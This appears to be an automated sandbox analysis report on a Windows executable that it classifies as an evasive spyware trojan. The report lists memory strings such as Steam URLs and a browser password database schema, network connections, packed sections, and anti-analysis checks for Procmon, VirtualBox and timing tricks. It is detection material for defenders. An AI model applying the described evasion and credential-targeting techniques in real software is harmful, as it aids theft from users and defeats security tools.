                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/com
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: LNn56KMkEE.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=englis
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2

                System Summary

                Source: LNn56KMkEE.exe Static PE information: section name:
                Source: LNn56KMkEE.exe Static PE information: section name: .idata
                Source: LNn56KMkEE.exe Static PE information: section name:
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_01012161 0_3_01012161
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_0588D9FB 0_3_0588D9FB
                Source: LNn56KMkEE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: LNn56KMkEE.exe Static PE information: Section: ZLIB complexity 0.9973646190068494
                Source: LNn56KMkEE.exe Static PE information: Section: srolqark ZLIB complexity 0.9948659202904002
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: LNn56KMkEE.exe, 00000000.00000003.1775865008.00000000058BD000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776312423.000000000588A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: LNn56KMkEE.exe Virustotal: Detection: 67%
                Source: LNn56KMkEE.exe ReversingLabs: Detection: 60%
                Source: LNn56KMkEE.exe String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File read: C:\Users\user\Desktop\LNn56KMkEE.exe
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Section loaded: version.dll
                Source: LNn56KMkEE.exe Static file information: File size 1866752 > 1048576
                Source: LNn56KMkEE.exe Static PE information: Raw size of srolqark is bigger than: 0x100000 < 0x19f600

                Data Obfuscation

                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Unpacked PE file: 0.2.LNn56KMkEE.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;srolqark:EW;yixtsbvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;srolqark:EW;yixtsbvq:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: LNn56KMkEE.exe Static PE information: real checksum: 0x1d1237 should be: 0x1d100f
                Source: LNn56KMkEE.exe Static PE information: section name:
                Source: LNn56KMkEE.exe Static PE information: section name: .idata
                Source: LNn56KMkEE.exe Static PE information: section name:
                Source: LNn56KMkEE.exe Static PE information: section name: srolqark
                Source: LNn56KMkEE.exe Static PE information: section name: yixtsbvq
                Source: LNn56KMkEE.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_0588CF4F push eax; iretd 0_3_0588CF55
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_0588CF5F pushad ; iretd 0_3_0588CF65
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_0588CF67 push 700588CFh; iretd 0_3_0588CF71
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_01047E44 push esi; retf 0_3_01047E47
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Code function: 0_3_0104618C push esi; retf 0_3_0104618F
                Source: LNn56KMkEE.exe Static PE information: section name: entropy: 7.979452992812568
                Source: LNn56KMkEE.exe Static PE information: section name: srolqark entropy: 7.954307245749782

                Boot Survival

                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\LNn56KMkEE.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\LNn56KMkEE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A41A1 second address: 6A41B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F2ADCE78B36h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A82D0 second address: 6A82FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2ADCE7BD66h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2ADCE7BD76h 0x00000015 jl 00007F2ADCE7BD66h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7877 second address: 6A78A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B43h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE78B43h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7A21 second address: 6A7A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7A26 second address: 6A7A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B44h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A8005 second address: 6A800B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A800B second address: 6A8020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2ADCE78B3Dh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
